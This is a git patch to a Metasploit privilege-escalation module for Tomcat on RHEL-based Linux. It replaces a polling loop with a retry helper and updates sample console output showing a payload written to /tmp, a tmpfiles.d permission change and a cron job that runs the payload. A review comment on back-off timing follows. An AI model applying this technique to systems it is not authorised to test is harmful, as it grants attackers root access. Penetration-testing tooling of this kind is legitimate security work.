From 62d43a6e9677a393cd61ba6412c39760d505de68 Mon Sep 17 00:00:00 2001
From: h00die
Date: Sat, 28 Jan 2023 07:44:53 -0500
Subject: [PATCH] use exploit retry function
---
 .../local/tomcat_rhel_based_temp_priv_esc.md | 5 ++++-
 .../local/tomcat_rhel_based_temp_priv_esc.rb | 18 ++++++------------
 2 files changed, 10 insertions(+), 13 deletions(-)
diff --git a/documentation/modules/exploit/linux/local/tomcat_rhel_based_temp_priv_esc.md b/documentation/modules/exploit/linux/local/tomcat_rhel_based_temp_priv_esc.md
index 2aa2113ca9..b9f69f78c0 100644
--- a/documentation/modules/exploit/linux/local/tomcat_rhel_based_temp_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/tomcat_rhel_based_temp_priv_esc.md
@@ -133,7 +133,10 @@ msf6 exploit(linux/local/tomcat_rhel_based_temp_priv_esc) > exploit
 [*] Writing '/tmp/.4ptbf6f4fW' (1068640 bytes) ...
 [*] Writing permission elevation into /usr/lib/tmpfiles.d/tomcat.conf
 [*] Creating cron job in /etc/cron.d/grPwZ
-[+] Waiting 1800 on tmpfiles-setup.service to restart (/usr/bin/systemd-tmpfiles --create)
+[+] Waiting 1800 seconds on tmpfiles-setup.service to restart (/usr/bin/systemd-tmpfiles --create)
+[*] Sleeping for 2 seconds before attempting again
+[*] Sleeping for 4 seconds before attempting again
+[*] Sleeping for 8 seconds before attempting again
 [-] /etc/cron.d/grPwZ not found, checking in 10 seconds
 [*] Waiting on cron to kick the payload (~1 minute)
 [+] Deleted /tmp/.4ptbf6f4fW
diff --git a/modules/exploits/linux/local/tomcat_rhel_based_temp_priv_esc.rb b/modules/exploits/linux/local/tomcat_rhel_based_temp_priv_esc.rb
index 5a52a3fd59..539aefa96e 100644
--- a/modules/exploits/linux/local/tomcat_rhel_based_temp_priv_esc.rb
+++ b/modules/exploits/linux/local/tomcat_rhel_based_temp_priv_esc.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Local
 Rank = ManualRanking
+ include Msf::Exploit::Retry
 include Msf::Post::Linux::Priv
 include Msf::Post::Linux::System
 include Msf::Post::File
@@ -155,24 +156,17 @@ class MetasploitModule < Msf::Exploit::Local
 register_file_for_cleanup(cron_job)
 # we now need systemd-tmpfiles to restart
- print_good("Waiting #{datastore['WfsDelay']} on tmpfiles-setup.service to restart (/usr/bin/systemd-tmpfiles --create)")
- timer = 0
- while timer < datastore['WfsDelay']
- if file? cron_job
- break
- end
-
- print_error("#{cron_job} not found, checking in 10 seconds")
- Rex.sleep(10)
- timer += 10
+ print_good("Waiting #{datastore['WfsDelay']} seconds on tmpfiles-setup.service to restart (/usr/bin/systemd-tmpfiles --create)")
+ succeeded = retry_until_truthy(timeout: datastore['WfsDelay']) do
+ file? cron_job
 end
- unless file? cron_job
+ unless succeeded
 print_error("#{cron_job} not found, exploit aborted")
 return
 end
- print_status('Waiting on cron to kick the payload (~1 minute)')
+ print_status('Waiting on cron to execute the payload (~1 minute)')
 end
 def cleanup
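Review bot: The switch to `retry_until_truthy` changes the polling cadence from a fixed 10 seconds to what looks like a doubling back-off (the updated sample output shows sleeps of 2, 4 and 8 seconds), and nothing at the call site says so. With the `WfsDelay` of 1800 shown in the documentation, the later intervals would presumably run to several minutes, so `succeeded` may be set long after `cron_job` appeared and the '~1 minute' status message that follows can mislead; a comment above the call such as `# retry_until_truthy backs off exponentially, so this check can lag well behind the file appearing` would make that explicit. The documentation hunk also keeps `not found, checking in 10 seconds` and `kick the payload` as context lines, although this hunk removes the first message and rewords the second, so the sample output no longer matches the code. The enclosing method starts before this hunk.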